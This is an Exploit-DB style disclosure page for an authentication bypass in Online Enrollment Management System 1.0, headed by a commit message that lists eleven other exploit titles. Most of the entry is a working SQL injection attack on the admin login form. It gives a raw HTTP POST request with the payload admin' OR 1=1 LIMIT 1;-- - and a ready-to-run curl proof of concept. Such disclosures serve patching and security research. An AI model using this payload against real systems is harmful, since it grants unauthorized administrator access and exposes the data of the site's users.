caf7ab9c86
12 changes to exploits/shellcodes Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC) IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated) Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS) Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated) Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation Simple Online College Entrance Exam System 1.0 - Account Takeover Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection Online Enrollment Management System 1.0 - Authentication Bypass Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass Loan Management System 1.0 - SQLi Authentication Bypass
21 lines
No EOL
926 B
Text
21 lines
No EOL
926 B
Text
# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass
|
|
# Date: 07.10.2021
|
|
# Exploit Author: Amine ismail @aminei_
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
|
|
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
|
|
# Version: 1.0
|
|
# Tested on: Windows 10, Kali Linux
|
|
# Admin panel authentication bypass
|
|
|
|
Admin panel authentication can be bypassed due to a SQL injection in the login form:
|
|
|
|
Request:
|
|
POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1
|
|
Host: 127.0.0.1
|
|
Content-Length: 63
|
|
Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q
|
|
|
|
user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin=
|
|
|
|
PoC:
|
|
curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php |